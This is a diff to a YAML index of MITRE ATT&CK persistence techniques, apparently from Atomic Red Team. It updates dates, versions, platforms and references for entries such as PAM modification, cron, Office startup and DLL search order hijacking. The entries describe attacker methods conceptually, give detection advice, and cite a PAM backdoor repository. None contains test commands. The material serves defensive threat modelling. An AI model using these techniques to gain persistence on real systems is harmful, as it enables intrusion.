       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1574.007:
@@ -27627,7 +28016,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -27715,7 +28103,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests: []
   T1543:
@@ -27800,11 +28187,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -27882,7 +28268,6 @@ persistence:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests: []
   T1546.006:
@@ -27915,7 +28300,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -27938,11 +28323,10 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -28000,9 +28384,8 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1542.001:
@@ -28083,12 +28466,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -28107,7 +28489,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -28121,7 +28502,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -28148,8 +28528,8 @@ persistence:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -28180,7 +28560,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1542.003:
@@ -28237,11 +28618,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -28313,9 +28693,9 @@ persistence:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -28331,12 +28711,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests: []
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -28411,7 +28790,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests: []
   T1542.005:
@@ -28454,7 +28832,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -28478,8 +28856,6 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1543.003:
     technique:
@@ -28634,31 +29010,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -28675,6 +29031,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -28685,9 +29042,13 @@ persistence:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -28695,17 +29056,37 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1137:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:01:21.255Z'
+      name: Office Application Startup
+      description: |-
+        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Nick Carr, Mandiant
       - Microsoft Threat Intelligence Center (MSTIC)
@@ -28713,79 +29094,73 @@ persistence:
       - Praetorian
       - Loic Jaquemet
       - Ricardo Dias
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.4'
+      x_mitre_data_sources:
+      - 'File: File Creation'
+      - 'Application Log: Application Log Content'
+      - 'Windows Registry: Windows Registry Key Modification'
+      - 'File: File Modification'
+      - 'Module: Module Load'
+      - 'Process: Process Creation'
+      - 'Windows Registry: Windows Registry Key Creation'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
       created: '2017-12-14T16:46:06.044Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137
         url: https://attack.mitre.org/techniques/T1137
-      - source_name: SensePost Ruler GitHub
-        url: https://github.com/sensepost/ruler
-        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
-          services. Retrieved February 4, 2019.'
+        external_id: T1137
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
       - source_name: TechNet O365 Outlook Rules
-        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
         description: Koeller, B.. (2018, February 21). Defending Against Rules and
           Forms Injection. Retrieved November 5, 2019.
+        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
       - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
         description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
           Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: SensePost Ruler GitHub
+        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+          services. Retrieved February 4, 2019.'
+        url: https://github.com/sensepost/ruler
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Office Application Startup
-      description: |-
-        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
-        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      x_mitre_detection: |-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
-        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-      x_mitre_version: '1.3'
+        url: https://github.com/sensepost/notruler
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'File: File Creation'
-      - 'Application Log: Application Log Content'
-      - 'Windows Registry: Windows Registry Key Modification'
-      - 'File: File Modification'
-      - 'Module: Module Load'
-      - 'Process: Process Creation'
-      - 'Windows Registry: Windows Registry Key Creation'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1137
     atomic_tests: []
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -28815,6 +29190,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -28825,6 +29201,7 @@ persistence:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -28833,13 +29210,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -28881,9 +29258,6 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests: []
   T1547.012:
@@ -28951,19 +29325,18 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -28979,8 +29352,8 @@ persistence:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -28994,7 +29367,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -29020,6 +29393,10 @@ persistence:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -29047,42 +29424,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1137.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
-      type: attack-pattern
-      created: '2019-11-07T19:52:52.801Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.006
-        url: https://attack.mitre.org/techniques/T1137/006
-      - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
-        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
-        source_name: Microsoft Office Add-ins
